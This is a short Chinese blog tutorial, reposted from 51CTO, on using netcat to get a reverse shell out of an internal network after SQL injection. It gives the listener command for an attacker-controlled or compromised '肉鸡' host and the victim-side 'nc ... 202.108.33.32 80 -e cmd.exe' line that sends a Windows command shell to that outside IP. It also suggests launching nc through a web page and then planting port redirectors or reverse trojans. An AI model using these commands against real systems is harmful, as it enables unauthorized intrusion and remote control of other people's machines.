nc命令小材大用

简介:


nc命令小材大用

simeon
通过本文你可以学到:
1SQL注入内网渗透的一种思路
2nc命令的一种好用法
   内网渗透对于网络安全爱好者,特别是网络入侵检测时无疑是一种疼,很多时候我们遇到这种情况只有采取放弃,其实不然,完全使用另外一种方法来进行突破。很多人多知道nc号称瑞士军刀,是一款非常不错的网络安全工具,其强大的功能毫不逊于一款远程控制软件,只是我们没有挖掘其强大的功能而已。本文只是探讨如何来进行内网突破的思维。下面讲讲本文对nc的具体用法。
(一)在控制端监听端口
这个控制端可以是自己的肉鸡,可以是在具有独立IP的网络计算机上,一定要具有独立IP,否则无法反弹到该IP地址。使用命令如下:
Nc –vv –l –p port 例如 nc –vv –l –p 80
在控制端监听端口时,需要注意的是,需要先使用“netstat -an”查看网络端口的开放情况(图1),选择一个未监听的端口,一般选择804434461102523端口为好,当然其他未用端口也可以。
使用netstat –an 查看端口开情况
说明:如果控制端已经开放了我们要监听的端口,那么我们使用nc监听该端口不会成功,nc程序会提示错误信息,如果监听正常,会显示“Listening on  [any] 80 …….”字样(图2)。
在控制端监听80端口
(二)在内网计算机开放端口
      在内网计算机上运行“nc –vv ipaddress port –e cmd.exe”,这里的IPaddress一定是控制端的ip地址,例如控制端的地址为“202.108.33.32,且80端口未开放,则在内网计算机上运行“nc –vv -202.108.33.32 80 –e cmd.exe”即可。如果一切正常,则会反弹一个dosshell回来,跟cmd命令的运行界面差不多,就象在本机的DOS下操作一样,非常好用,可以粘贴命令,直接执行命令等(图3)。使用“net user”命令,可以看到我的账号“simeon”在其中。
反弹shell成功
(三)其它运用
本文介绍的是如何使用nc来反弹内网的shell,在sql注入的过程中,很多时候遇到独立主机是内网IP,及时主机开放了3389也无法连接进去,这个时候,一个真正的dosshell就特别重要,通过网页执行nc命令,提供该内网一个shell,然后执行lcx端口重定向或者执行反弹木马或者其他命令,无疑是一个很好的解决方法。
(四)结束语
    本文就技术难度来说,并不是很大,nc这个软件很多朋友都熟悉,可以这么说,搞网络安全的没有不熟悉nc这个软件的,但是对于nc命令的很多用法,不一定熟悉。想不起来曾经看过的一部电影,其中有这么一段话,高手就是将一个复杂的动作做到单一和简单!这跟真正的武林高手一样,不一定需要太多招式,一刀一剑就可以致命取胜。网络安全也是如此,对一个工具要熟能生巧,举一反三,才能出现更多的用法,更多的新的idea,期待大家新的发现。


 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/38498

相关文章
|
5月前
|
网络协议 Linux 网络安全
Linux命令(4)之nc
Linux命令(4)之nc
62 0
|
7月前
NC14662 小咪买东西
NC14662 小咪买东西
|
7月前
NC21874 好串
NC21874 好串
|
7月前
[NC18386]字符串
[NC18386]字符串
|
域名解析 网络协议 Shell
【工具】nc使用详解
本文将详细讲解nc使用以及相关网络知识,适合初学者
492 0
|
网络协议 数据库
[20171204]nc快速判断端口是否打开2.txt
[20171204]nc快速判断端口是否打开2.txt --//前几天写了一篇通过nc快速判断打开那些端口,链接如下: http://blog.itpub.net/267265/viewspace-2148121/ --//如果要判断一定的范围,可以执行如下: $ echo a | nc -w 1 -n -v  192.
1026 0
|
网络协议 Apache Linux
[20171201]nc快速判断端口是否打开.txt
[20171201]nc快速判断端口是否打开.txt --//nc快速判断端口是否打开,例子: $ echo exit | nc -w 1 -n -v  192.168.
1206 0
|
网络协议 缓存 Python